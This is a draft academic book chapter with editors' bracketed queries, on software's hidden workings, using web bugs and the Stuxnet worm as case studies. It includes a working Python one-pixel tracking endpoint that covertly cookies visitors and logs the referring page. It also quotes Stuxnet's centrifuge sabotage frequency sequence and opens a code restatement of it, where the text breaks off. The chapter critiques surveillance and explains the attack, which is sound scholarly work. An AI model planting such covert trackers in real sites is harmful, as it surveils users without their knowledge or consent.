&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary, kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'this'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we have now entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life would be simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], had we not already discounted and backgrounded their importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, and one I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacrum lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind flat glass rectangles which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking of physical keyboards and trackpads as much as of haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Introduced as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users has important privacy implications, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
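&lt;br /&gt;
How little machinery such tracking requires can be seen in the following sketch, in Python, of a one-pixel web bug endpoint: it tags each visitor with an identifying cookie and logs the page that embedded the pixel. This is purely illustrative; all names, the port, and the log format are hypothetical, and a page would embed it with an image tag of exactly the kind quoted from the EFF below: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;# Illustrative sketch of a one-pixel 'web bug' endpoint; not any real tracker &lt;br /&gt;
from http.server import BaseHTTPRequestHandler, HTTPServer &lt;br /&gt;
import uuid &lt;br /&gt;
&lt;br /&gt;
# a (near-)minimal transparent 1x1 GIF: the classic invisible tracking image &lt;br /&gt;
PIXEL = (b'GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00' &lt;br /&gt;
         b'!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01' &lt;br /&gt;
         b'\x00\x00\x02\x02D\x01\x00;') &lt;br /&gt;
&lt;br /&gt;
class WebBugHandler(BaseHTTPRequestHandler): &lt;br /&gt;
    def do_GET(self): &lt;br /&gt;
        uid = self.headers.get('Cookie') or ('uid=' + uuid.uuid4().hex) &lt;br /&gt;
        # the Referer header reveals which page embedded the pixel &lt;br /&gt;
        print('saw', uid, 'on', self.headers.get('Referer')) &lt;br /&gt;
        self.send_response(200) &lt;br /&gt;
        self.send_header('Set-Cookie', uid) &lt;br /&gt;
        self.send_header('Content-Type', 'image/gif') &lt;br /&gt;
        self.end_headers() &lt;br /&gt;
        self.wfile.write(PIXEL) &lt;br /&gt;
&lt;br /&gt;
HTTPServer(('localhost', 8001), WebBugHandler).serve_forever()&amp;lt;/pre&amp;gt; &lt;br /&gt;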
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user; should the code be observed, it looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any)&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given about data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users' desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
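&lt;br /&gt;
In the same 'track the trackers' spirit as Ghostery or Collusion, the basic idea can be sketched in a few lines of Python: list the third-party hosts a page statically asks the browser to contact. This is only a crude approximation - real tools inspect live traffic and so also catch the dynamically injected, obfuscated scripts discussed above: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;# Crude 'track the trackers' sketch: list third-party hosts a page embeds &lt;br /&gt;
from html.parser import HTMLParser &lt;br /&gt;
from urllib.parse import urlparse &lt;br /&gt;
from urllib.request import urlopen &lt;br /&gt;
&lt;br /&gt;
class ThirdPartyFinder(HTMLParser): &lt;br /&gt;
    def __init__(self, first_party): &lt;br /&gt;
        super().__init__() &lt;br /&gt;
        self.first_party = first_party &lt;br /&gt;
        self.hosts = set() &lt;br /&gt;
    def handle_starttag(self, tag, attrs): &lt;br /&gt;
        if tag in ('script', 'img', 'iframe'): &lt;br /&gt;
            host = urlparse(dict(attrs).get('src') or '').netloc &lt;br /&gt;
            if host and host != self.first_party: &lt;br /&gt;
                self.hosts.add(host) &lt;br /&gt;
&lt;br /&gt;
url = 'http://www.nytimes.com/'  # the example page from Madrigal's account &lt;br /&gt;
finder = ThirdPartyFinder(urlparse(url).netloc) &lt;br /&gt;
finder.feed(urlopen(url).read().decode('utf-8', 'ignore')) &lt;br /&gt;
print(sorted(finder.hosts))&amp;lt;/pre&amp;gt; &lt;br /&gt;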
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second-guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen from the relative frequency of encounters, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers (web site operators). Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed in testimony to a U.S. House of Representatives subcommittee that it is ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers the user little in the way of diagnosis or even warnings. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid attracting too much unwanted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the do-not-track header, and there is currently no legal requirement that they do so, in the US or elsewhere (W3C, 2012). See, though, the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
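&lt;br /&gt;
Technically, the 'do not track' flag is trivial - a single HTTP request header - which is partly why the dispute is political rather than technical. A hypothetical server that chose to honour it would need only something like the following sketch (nothing, of course, obliges a real server to behave this way): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;# Sketch of honouring the proposed DNT header; illustrative only &lt;br /&gt;
from http.server import BaseHTTPRequestHandler, HTTPServer &lt;br /&gt;
&lt;br /&gt;
class DNTAwareHandler(BaseHTTPRequestHandler): &lt;br /&gt;
    def do_GET(self): &lt;br /&gt;
        self.send_response(200) &lt;br /&gt;
        if self.headers.get('DNT') != '1': &lt;br /&gt;
            # no opt-out signalled: tag the visitor as usual &lt;br /&gt;
            self.send_header('Set-Cookie', 'uid=tracked-visitor') &lt;br /&gt;
        self.send_header('Content-Type', 'text/plain') &lt;br /&gt;
        self.end_headers() &lt;br /&gt;
        self.wfile.write(b'hello') &lt;br /&gt;
&lt;br /&gt;
HTTPServer(('localhost', 8002), DNTAwareHandler).serve_forever()&amp;lt;/pre&amp;gt; &lt;br /&gt;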
&lt;br /&gt;
Indicative of the direction of travel, one of the newer web bugs is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims 'an eye on 1091622 websites', and which shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growing use of these tracker technologies. Pew (2012) found, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would &amp;quot;not be okay&amp;quot; with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be &amp;quot;okay&amp;quot; with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This is an issue helpfully illustrated by the next case study, of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This next example is a computer worm called Stuxnet,[6] which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. Its name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; and the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system, which it then plays back to the operators to disguise the fact that it is actually gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals, so that an infected system does not exhibit abnormal behavior and therefore does not raise an alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotage effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
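&lt;br /&gt;
The attack sequence Zetter reconstructs is, at bottom, a simple timed state machine. The following toy restatement in Python of that published account shows how little logic is needed once the stealth layer is in place; the real warheads were PLC code, and set_frequency here merely stands in for commands to the frequency converters: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;# Toy restatement of the attack sequence described by Zetter (2011) &lt;br /&gt;
import itertools, time &lt;br /&gt;
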